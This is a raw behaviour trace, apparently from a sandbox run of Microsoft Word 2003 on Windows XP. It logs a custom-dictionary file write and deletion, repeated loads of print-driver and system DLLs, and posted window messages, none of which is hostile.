    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 505670248
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505670626
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 505671770
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505674167
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505678473
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: write and read and execute Type: commit Baseaddress: 2320000 Size: 3346432 Protection: execute Mapped to pid: own pid success or wait 505747927
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: query and write and read and execute Type: image Baseaddress: 3F100000 Size: 3346432 Protection: read write Mapped to pid: own pid success or wait 505749487
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506242420
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506521867
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506572531
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506801343
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506917942
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506981770
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507589571
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507637926
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507657754
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507696464
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507728734
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507763189
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507825459
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 508027309
    Thread created PID: 296 TID: 236 EIP: 7C8106F9 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Injected: false success or wait 522514599
    Thread resumed TID: 236 PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 522515316
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 745472 Protection: execute Mapped to pid: own pid success or wait 522633679
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll Access: query and write and read and execute Type: image Baseaddress: 7E5A0000 Size: 761856 Protection: read write Mapped to pid: own pid success or wait 522638248
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522662126
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522678602
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522681392
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522685568
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522706820
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522715428
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522717684
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522719983
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522733826
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522742112
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522744791
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522747012
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 765952 Protection: execute Mapped to pid: own pid success or wait 522765795
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll Access: query and write and read and execute Type: image Baseaddress: 3F500000 Size: 786432 Protection: read write Mapped to pid: own pid success or wait 522768107
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522783577
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522793775
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522796137
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522798520
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522814486
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522823214
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522825551
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522827919
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522848346
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522857318
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522859765
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522862250
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522877036
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522885644
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522888479
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522890956
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522905870
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522914399
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522916834
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522919309
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522938138
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522948173
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522950588
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522953063
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522968873
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522977367
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522979803
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522982275
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: write and read and execute Type: commit Baseaddress: 2F20000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 523009678
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: query and write and read and execute Type: image Baseaddress: 69310000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 523013270
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523035435
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523043938
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523046295
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523048679
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523062704
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523070124
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523072447
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523074824
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523088795
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523097110
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523099654
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523102379
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523156349
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523164623
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523166905
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523169223
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523188169
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523196431
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523198727
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523201037
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523214815
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523223084
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523225357
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523227674
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523248229
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523256575
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523258944
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523261305
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523275299
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523284168
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523286589
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523288974
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523304272
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523312868
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523315484
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523318234
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523333537
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523341931
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523344462
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523346939
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523362613
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523371214
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523373738
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523376330
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523394715
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523403375
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523429375
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523431876
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523446693
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523455349
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523457985
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523476963
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: write and read and execute Type: commit Baseaddress: 2F20000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 523494024
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: query and write and read and execute Type: image Baseaddress: 69310000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 523496691
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523504583
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523513024
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523515357
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523517561
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523531647
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523540097
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523542441
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523544821
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523558865
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523567637
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523569999
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523572780
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: write and read and execute Type: commit Baseaddress: 1D90000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 531421658
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: query and read Type: commit Baseaddress: 1D90000 Size: 200704 Protection: readonly Mapped to pid: own pid success or wait 531425462
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: write and read and execute Type: commit Baseaddress: 1D90000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 531429866
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: query and read Type: commit Baseaddress: 1D90000 Size: 200704 Protection: readonly Mapped to pid: own pid success or wait 531431976
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: execute Mapped to pid: own pid success or wait 531448606
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: query and read Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: readonly Mapped to pid: own pid success or wait 531452550
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: execute Mapped to pid: own pid success or wait 531468107
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: query and read Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: readonly Mapped to pid: own pid success or wait 531470228
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 549816878
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 549849168
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 550375178
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 550619698
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 562736260
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 575167317
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 575368955
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 587548030
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 600708778
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 600748468
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 613570676
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 613811322
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 625854965
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 688220306
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 688707957
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 688909149
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.MAB Access: query and write and read Type: reserve Baseaddress: 1D90000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 691542707
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 701046757
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 752183198
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 789956247
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 790821212
    Message posted HWND: 10180 Message: 402 WParam: 0 LParam: 0 success 815804142